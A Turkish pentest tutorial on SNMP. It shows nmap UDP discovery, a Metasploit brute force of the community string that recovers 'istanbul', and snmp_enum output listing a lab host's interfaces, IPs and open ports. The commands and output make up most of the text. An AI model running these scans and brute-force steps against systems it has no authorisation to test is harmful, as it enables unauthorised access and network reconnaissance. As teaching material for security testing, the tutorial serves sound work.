SNMP Servisine Yönelik Saldırı ve Bilgi Toplama Yöntemleri

SNMP (Simple Network Management Protocol) , aktif ağ cihazları hakkında bilgi toplamak için kullanılır. Switch, Router, Firewall ve hatta işletim sistemleri SNMP ile monitor edilebilir. Network uzmanları SNMP servisi ile, uzak sistemin network trafiği, canlı bağlantılar, config bilgileri, port durumları vs. görüntüleyerek yönetim kolaylığı sağlarlar.

SNMP v1 ve SNMP v2 protokolleri bir topluluk anahtarı (community string) ile sorgulama yapar ve varsayılan olarak “public” dir. SNMP v3’de ise daha güvenlidir ve kimlik doğrulama seçenekleri mevcuttur. SNMP servisi, varsayılan olarak UDP port 161 den çalışır.

 

 

Pentest Çalışmalarında SNMP Servisinin Keşfi

UDP 161 varsayılan portundan çalışan snmp servislerine yönelik keşif çalışması;

$ sudo nmap -sU -sV 6.6.6.0/24 -p 161
Starting Nmap 5.21 ( ) at 2011-10-25 10:41 EEST
Nmap scan report for 6.6.6.100
Host is up (0.0063s latency).
PORT STATE SERVICE VERSION
161/udp open|filtered snmp

MAC Address: 00:0C:29:CF:A1:67 (VMware)
Nmap scan report for 6.6.6.104
Host is up (0.062s latency).
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server (public)
MAC Address: 00:1E:8F:AF:AB:23 (Canon)
Service Info: Host: MF4500 Series

– 6.6.6.104 snmp servisi açık ve community string ise “public“.

– 6.6.6.100 ip adresi için udp 161 açık veya filtrelenmiş olabilir dedi, neden ?

UDP, TCP protokolü gibi durum korumalı bir protokol değildir.Hata mekanizması ICMP ile yapılır. Açık bir UDP portuna bağlantı kurulduğunda, herhangi bir cevap dönmez bağlantı kurmuşsunuzdur. Kapalı bir UDP portuna bağlantı kurmak istediğinizde ise ICMP Port Unreachable mesajı döner. Peki hedef sistemin önünde bir firewall var ve bağlantıları drop ediyorsa ?  bu durumda da portun açık yada filtreli olduğunu belirtir nmap.

SNMP Brute Force Saldırıları

SNMP servisine yönelik comminitry string’i brute force saldırısı ile deneme-yanılma yaparak öğrenebiliriz.Metasploit yardımcı araçları (auxiliary) ile snmp brute force saldırısı yapılabilir.

msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS 6.6.6.100
msf auxiliary(snmp_login) > show options

Module options (auxiliary/scanner/snmp/snmp_login):

Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
CHOST no The local client address
PASSWORD no The password to test
PASS_FILE /opt/framework-3.7.1/msf3/data/wordlists/snmp_default_pass.txt no File containing communities, one per line
RHOSTS 6.6.6.100 yes The target address range or CIDR identifier
RPORT 161 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USER_AS_PASS true no Try the username as the password for all users
VERBOSE true yes Whether to print output for all attempts

msf auxiliary(snmp_login) > exploit

[*] 6.6.6.100:161 - SNMP - Trying public...
[*] 6.6.6.100:161 - SNMP - Trying private...
[*] 6.6.6.100:161 - SNMP - Trying 0...
[*] 6.6.6.100:161 - SNMP - Trying 0392a0...
[*] 6.6.6.100:161 - SNMP - Trying 1234...
[*] 6.6.6.100:161 - SNMP - Trying 2read...
[*] 6.6.6.100:161 - SNMP - Trying 4changes...
...
...
[+] SNMP: 6.6.6.100 community string: 'istanbul' info: 'pf.cehturkiye.com 4226682934 FreeBSD 8.1-RELEASE-p4'
[*] Validating scan results from 1 hosts...

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Hedefin snmp communitry string değeri “istanbul“.

SNMP Servisinden Bilgi Toplamak

 

msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(snmp_enum) > show options

Module options (auxiliary/scanner/snmp/snmp_enum):

Name Current Setting Required Description
---- --------------- -------- -----------
COMMUNITY public yes SNMP Community String
RETRIES 1 yes SNMP Retries
RHOSTS yes The target address range or CIDR identifier
RPORT 161 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 1 yes SNMP Timeout
VERSION 1 yes SNMP Version <1/2c>

msf auxiliary(snmp_enum) > set RHOSTS 6.6.6.100
RHOSTS => 6.6.6.100
msf auxiliary(snmp_enum) > set COMMUNITY istanbul
COMMUNITY => istanbul
msf auxiliary(snmp_enum) > exploit

[*] 6.6.6.100, Connected.
[*] System information

Host IP : 6.6.6.100
Hostname : pf.cehturkiye.com
Description : pf.cehturkiye.com 4226682934 FreeBSD 8.1-RELEASE-p4
Contact : mail@ozanucar.com
Location : cehturkiye
Uptime snmp : -
Uptime system : 00:00:04.98
System date : -
Network information:
IP forwarding enabled : yes
Default TTL : 64
TCP segments received : 1467
TCP segments sent : 1916
TCP segments retrans : 1
Input datagrams : 5017
Delivered datagrams : 4964
Output datagrams : 3696
Network interfaces:
Interface : [ unknown ] em0
Id : 1
Mac Address : 00:0c:29:cf:a1:5d
Type : unknown
Speed : 1000 Mbps
MTU : 1500
In octets : 205526
Out octets : 672

Interface : [ unknown ] em1
Id : 2
Mac Address : 00:0c:29:cf:a1:67
Type : unknown
Speed : 1000 Mbps
MTU : 1500
In octets : 573980
Out octets : 1451734

Interface : [ unknown ] pflog0
Id : 7
Mac Address : :::::
Type : unknown
Speed : 0 Mbps
MTU : 33200
In octets : 0
Out octets : 1529

Network IP:
Id IP Address Netmask Broadcast
1 0.0.0.0 0.0.0.0 0
3 1.1.1.1 255.255.255.0 1
2 6.6.6.100 255.255.255.0 1
1 6.6.6.191 255.255.255.0 1
5 127.0.0.1 255.0.0.0 1
TCP connections and listening ports:
Local address Local port Remote address Remote port State
0.0.0.0 22 0.0.0.0 0 unknown
0.0.0.0 53 0.0.0.0 0 unknown
0.0.0.0 80 0.0.0.0 0 unknown
6.6.6.100 22 6.6.6.64 42153 unknown
6.6.6.191 80 6.6.6.64 54693 unknown
Listening UDP ports:
Local address Local port
0.0.0.0 0
0.0.0.0 53
0.0.0.0 161
0.0.0.0 514
6.6.6.191 5975
6.6.6.191 43463
6.6.6.191 61547
127.0.0.1 6969

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Yazar: Ozan UÇAR
ozan.ucar@bga.com.tr